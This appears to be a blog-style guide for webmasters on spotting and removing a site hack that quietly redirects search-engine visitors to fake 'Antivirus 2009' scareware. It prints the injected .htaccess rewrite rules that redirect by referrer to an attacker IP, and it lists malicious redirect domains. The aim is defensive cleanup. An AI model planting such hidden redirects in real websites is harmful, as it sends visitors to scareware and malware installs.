Symptoms

  1. Abrupt decrease of search engine traffic. Almost to zero. – always
  2. People complain that when they visit your site, it says their computer is infected with spyware and forces them to install Antivirus 2009, but when you open the site yourself, you don’t see anything suspicious. – if your site visitors care enough to complain
  3. Warnings in google search results that visiting your site may harm a computer. – only if Google has already detected the exploit. This may be a sign of some other exploit as well.
  4. Firefox 3 and Google Chrome browsers wouldn’t let anyone visit your site and warn web surfers that your site is an “attack site”. – only if Google (Firefox uses Google’s base) has already detected the exploit. This may be a sign of some other exploit as well.

How to detect?

The easiest and safest way to detect this exploit is to use Unmask Parasites. Just enter the site address and click “Check”. Your site is infected if the report contains this chain of four redirects:

302 -> http://89.28.13.204/in.html?s=xx
302 -> http://wwwinfoclick.com/soft.php?aid=0865&d=1&product=XPA&refer=ff94bbac7
302 -> http://defense-live-scan.com/2009/1/freescan.php?nu=880865
302 -> http://defense-live-scan.com/2009/1/en/freescan.php?id=880865

The domain names and IP addresses may vary but the pattern will be the same:

  1. The first redirect goes to an IP address (89.28.13.20x, 87.248.180.90, maseo .ru/ h.php)
  2. The second redirect goes to soft.php script on some domain (wwwinfoclick.com, privatewebsphere.com, clicksoverview.com, proweb-info.com, etc.)
  3. The third and fourth redirects go to freescan.php scripts on the same site (defense-live-scan.com, antivirus-protectionscan.com, antivirusdefense.com, computerquickscanner .com, pro-scanner-online .com, antivirus-bestscan.com, pcantivirusscan.com, anti-virus-live-scanner.com, etc) and there is “2009″ in the path.

Alternatively, you can search for your site on major search engines and click the search results. I don’t suggest that you do it in IE with JavaScript turned on though…

How to clean up?

  1. In the root of your web server, find the .htaccess file. It’s a hidden file so you might need to configure your FTP client to show hidden files.
  2. Open this file and locate the following code:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

    The IP address may be slightly different and there may be a couple screens of blank lines before this code and you’ll need to scroll down to find it.
  3. Delete this code.
  4. Don’t delete .htaccess if you don’t have any other code in this file or symply don’t need this file. Just leave an empty file.
  5. Assign this file “644″ permissions (everyone can read but only the owner can write) so that no one else could modify this file.
    If you have a command line access use the following command: chmod 644 .htaccess
    If you only have FTP access, check your FTP client’s documentation on how to change file permissions. (All decent FTP clients have this feature).